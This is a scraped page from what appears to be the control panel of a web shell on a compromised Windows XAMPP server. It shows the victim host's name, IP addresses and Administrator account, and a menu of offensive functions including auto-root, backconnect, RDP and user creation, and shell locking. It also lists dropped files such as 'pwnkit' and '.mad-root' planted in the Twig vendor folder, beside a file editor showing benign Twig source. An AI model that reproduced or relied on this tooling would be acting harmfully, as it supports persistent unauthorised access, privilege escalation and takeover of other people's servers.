Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.214
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
twig /
twig /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Cache
[ DIR ]
drwxrwxrwx
Error
[ DIR ]
drwxrwxrwx
Extension
[ DIR ]
drwxrwxrwx
Loader
[ DIR ]
drwxrwxrwx
Node
[ DIR ]
drwxrwxrwx
NodeVisitor
[ DIR ]
drwxrwxrwx
Profiler
[ DIR ]
drwxrwxrwx
RuntimeLoader
[ DIR ]
drwxrwxrwx
Sandbox
[ DIR ]
drwxrwxrwx
TokenParser
[ DIR ]
drwxrwxrwx
Util
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Compiler.php
4.94
KB
-rw-rw-rw-
Environment.php
24.33
KB
-rw-rw-rw-
ExpressionParser.php
32.31
KB
-rw-rw-rw-
ExtensionSet.php
13.07
KB
-rw-rw-rw-
FileExtensionEscapingStrategy....
1.41
KB
-rw-rw-rw-
Lexer.php
19
KB
-rw-rw-rw-
Markup.php
939
B
-rw-rw-rw-
NodeTraverser.php
1.78
KB
-rw-rw-rw-
Parser.php
11
KB
-rw-rw-rw-
Source.php
1023
B
-rw-rw-rw-
Template.php
12.52
KB
-rw-rw-rw-
TemplateWrapper.php
2.63
KB
-rw-rw-rw-
Token.php
5.17
KB
-rw-rw-rw-
TokenStream.php
3.45
KB
-rw-rw-rw-
TwigFilter.php
3.05
KB
-rw-rw-rw-
TwigFunction.php
2.79
KB
-rw-rw-rw-
TwigTest.php
2.25
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TwigFilter.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig; use Twig\Node\Expression\FilterExpression; use Twig\Node\Node; /** * Represents a template filter. * * @author Fabien Potencier <fabien@symfony.com> * * @see https://twig.symfony.com/doc/templates.html#filters */ final class TwigFilter { private $name; private $callable; private $options; private $arguments = []; /** * @param callable|null $callable A callable implementing the filter. If null, you need to overwrite the "node_class" option to customize compilation. */ public function __construct(string $name, $callable = null, array $options = []) { $this->name = $name; $this->callable = $callable; $this->options = array_merge([ 'needs_environment' => false, 'needs_context' => false, 'is_variadic' => false, 'is_safe' => null, 'is_safe_callback' => null, 'pre_escape' => null, 'preserves_safety' => null, 'node_class' => FilterExpression::class, 'deprecated' => false, 'alternative' => null, ], $options); } public function getName(): string { return $this->name; } /** * Returns the callable to execute for this filter. * * @return callable|null */ public function getCallable() { return $this->callable; } public function getNodeClass(): string { return $this->options['node_class']; } public function setArguments(array $arguments): void { $this->arguments = $arguments; } public function getArguments(): array { return $this->arguments; } public function needsEnvironment(): bool { return $this->options['needs_environment']; } public function needsContext(): bool { return $this->options['needs_context']; } public function getSafe(Node $filterArgs): ?array { if (null !== $this->options['is_safe']) { return $this->options['is_safe']; } if (null !== $this->options['is_safe_callback']) { return $this->options['is_safe_callback']($filterArgs); } return null; } public function getPreservesSafety(): ?array { return $this->options['preserves_safety']; } public function getPreEscape(): ?string { return $this->options['pre_escape']; } public function isVariadic(): bool { return $this->options['is_variadic']; } public function isDeprecated(): bool { return (bool) $this->options['deprecated']; } public function getDeprecatedVersion(): string { return \is_bool($this->options['deprecated']) ? '' : $this->options['deprecated']; } public function getAlternative(): ?string { return $this->options['alternative']; } }
Close